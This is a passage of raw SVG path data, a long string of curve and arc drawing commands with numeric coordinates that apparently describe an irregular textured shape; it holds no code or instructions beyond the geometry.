c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.